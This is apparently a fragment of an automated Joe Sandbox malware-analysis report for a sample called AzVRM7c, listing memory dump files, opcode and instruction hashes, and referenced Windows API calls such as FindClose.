                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
                                                                                                                                                                                                                                                                                          • Instruction ID: f993fa0e9d3ebb8f93f376a5e64f8aeb8dbf47ec6cd2f3f29e705c8d0fa8a669
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2301C461A08742C4EB15DB5299800BDA794BF89FE0F084A39FE5CA7BD6CE3CE401C711
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68459E3AC: FindClose.KERNEL32(?,?,?,?,00007FF684585182), ref: 00007FF68459E3B6
                                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684588816
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1011579015-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
                                                                                                                                                                                                                                                                                          • Instruction ID: b5f442078f4246e699013a46e61e59316bd6ee60f7683d42c750d4c59184bb05
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 730181A1B25586C1EF54DB6AD09537D2361FF44F88F54043ACA0C97A59DF2DE881C305